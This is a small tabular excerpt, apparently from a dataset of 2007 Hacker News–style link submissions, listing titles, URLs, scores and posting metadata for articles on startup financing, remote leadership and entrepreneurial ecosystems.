3 Ways To Fund Your Business: How To Finance A Startup For The Best Growth
null
http://www.thedigeratilife.com/blog/index.php/2007/04/19/3-ways-to-fund-your-business-how-to-finance-a-startup-for-the-best-growth/
1
0
null
null
null
null
null
null
null
null
null
null
train
18,785
brett
2007-05-02T18:12:50
The Post Money Value: Remote Work vs. Remote Leadership
null
http://ricksegal.typepad.com/pmv/2007/05/remote_work_vs_.html
6
0
null
null
null
null
null
null
null
null
null
null
train
18,786
mattjaynes
2007-05-02T18:14:19
Top 10 Ways to Suffocate an Entrepreneurial Ecosystem
null
http://docs.google.com/Doc?id=ddr8jzqk_15frnwgb
7
2
[ 18941, 18826 ]
null
null
null
null
null
null
null
null
null
train